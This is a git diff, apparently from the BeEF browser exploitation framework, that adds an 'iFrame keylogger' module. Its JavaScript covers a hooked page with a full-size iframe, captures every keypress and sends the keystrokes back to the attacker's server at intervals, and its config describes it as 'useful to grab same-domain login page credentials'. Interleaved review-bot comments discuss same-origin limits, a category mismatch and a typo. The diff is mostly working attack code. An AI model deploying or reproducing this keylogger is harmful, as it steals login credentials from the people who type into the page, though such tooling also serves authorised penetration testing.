diff --git a/extensions/demos/html/secret_page.html b/extensions/demos/html/secret_page.html
index cf295841d..2fa35f875 100644
--- a/extensions/demos/html/secret_page.html
+++ b/extensions/demos/html/secret_page.html
@@ -9,5 +9,7 @@ This page is not hooked by beef. However you should still be capable of accessing it using the Requester.

+   

+
\ No newline at end of file
diff --git a/modules/persistence/iframe_keylogger/command.js b/modules/persistence/iframe_keylogger/command.js
new file mode 100644
index 000000000..c9ce7d3d0
--- /dev/null
+++ b/modules/persistence/iframe_keylogger/command.js
@@ -0,0 +1,70 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ // logged keystrokes array
+ var stream = new Array();
+
+ // add the pressed key to the keystroke stream array
+ function keyPressHandler(evt) {
+ evt = evt || window.event;
+ if (evt) {
+ var keyCode = evt.charCode || evt.keyCode;
+ charLogged = String.fromCharCode(keyCode);
+ stream.push(charLogged);
+ }
+ }
+
+ // creates the overlay 100% width/height iFrame
+ overlay = beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null);
+
+ if(beef.browser.isIE()){
+ // listen for keypress events on the iFrame
+ function setKeypressHandler(windowOrFrame, keyHandler) {
+ var doc = windowOrFrame.document;
+ if (doc) {
+ if (doc.attachEvent) {
+ doc.attachEvent(
+ 'onkeypress',
+ function () {
+ keyHandler(windowOrFrame.event);
+ }
+ );
+ }
+ else {
+ doc.onkeypress = keyHandler;
+ }
+ }
+ }
+
+ setKeypressHandler(window.frames.overlayiframe, keyPressHandler);
+
+ }else{
+ document.getElementById('overlayiframe').contentWindow.addEventListener('keypress', keyPressHandler, true);
+ }
+
+ // every N seconds send the keystrokes back to BeEF
+ setInterval(function queue() {
+ var keystrokes = "";
+ if (stream.length > 0) {
+ for (var i = 0; i < stream.length; i++) {
+ keystrokes += stream[i] + "";
+ }
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "keystrokes=" + keystrokes);
+ stream = new Array();
+ }
+ }, <%= @sendBackInterval %>)
+});
diff --git a/modules/persistence/iframe_keylogger/config.yaml b/modules/persistence/iframe_keylogger/config.yaml
new file mode 100644
index 000000000..d8d4c9282
--- /dev/null
+++ b/modules/persistence/iframe_keylogger/config.yaml
@@ -0,0 +1,26 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ iframe_keylogger:
+ enable: true
+ category: "Persistence"
+ name: "iFrame keylogger"
+ description: "Creates a 100% by 100% iFrame overlay displaying the choosen resource, and add JS keylogging capabilities on that iFrame. Useful to grab same-domain login page credentials."
+ authors: ["antisnatchor"]
+ target:
+ working: [IE, FF, S, C]
+ not_working: [O]
diff --git a/modules/persistence/iframe_keylogger/module.rb b/modules/persistence/iframe_keylogger/module.rb
new file mode 100644
index 000000000..abcbec0dc
--- /dev/null
+++ b/modules/persistence/iframe_keylogger/module.rb
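Review bot: command.js never states the precondition that both listener branches depend on: the framed document must be same-origin with the hooked page. In the non-IE branch, `document.getElementById('overlayiframe').contentWindow.addEventListener(...)` is blocked by the same-origin policy for a cross-origin frame, and the IE branch's `windowOrFrame.document` access has the same constraint. config.yaml's description says "same-domain", but the script itself carries no such note. I would add above the `createIframe` call: `// iFrameSrc must be same-origin with the hooked page; cross-origin frames deny contentWindow/document access, and pages sent with X-Frame-Options: DENY or CSP frame-ancestors 'none' will not render in the overlay.` That also records which response headers on a login page stop the overlay from loading.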
@@ -0,0 +1,54 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Iframe_keylogger < BeEF::Core::Command
+
+ #
+ # Defines and set up the command module.
+ #
+ def initialize
+ super({
+ 'Name' => 'iFrame keylogger',
+ 'Description' => 'Creates a 100% by 100% iFrame overlay displaying the choosen resource, and add JS keylogging capabilities on that iFrame. Useful to grab same-domain login page credentials.',
+ 'Category' => 'Misc',
+ 'Author' => 'antisnatchor',
+ 'Data' => [
+ {'name' => 'iFrameSrc', 'ui_label'=>'iFrame Src', 'type' => 'textarea', 'value' =>'/demos/secret_page.html', 'width' => '400px', 'height' => '50px'},
+ {'name' => 'sendBackInterval', 'ui_label' => 'Send Back Interval (ms)', 'value' => '2000', 'width'=>'100px' }
+
+ ],
+ 'File' => __FILE__
+ })
+
+ # works in every latest browser (IE8, Firefox 5, Chrome 12, Safari 5) except Opera
+ set_target({
+ 'verified_status' => VERIFIED_WORKING,
+ 'browser_name' => ALL
+ })
+ set_target({
+ 'verified_status' => VERIFIED_NOT_WORKING,
+ 'browser_name' => O
+ })
+
+ use_template!
+ end
+
+ def callback
+ content = {}
+ content['keystrokes'] = @datastore['keystrokes']
+ save content
+ end
+
+end
\ No newline at end of file
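Review bot: `'Category' => 'Misc'` in `initialize` disagrees with config.yaml in this same commit, which declares `category: "Persistence"`, and with the module's location under modules/persistence/. Presumably the line should read `'Category' => 'Persistence',` so the two declarations agree; which of the two the framework reads at load time is not visible in this diff. The `'Description'` string spells "choosen" for "chosen", and config.yaml's `description` carries the same typo. Separately, `sendBackInterval` is a free-text option that command.js renders unquoted as the `setInterval` delay, so its `'Data'` entry would benefit from a comment such as `# must be an integer number of milliseconds; rendered unquoted into command.js`.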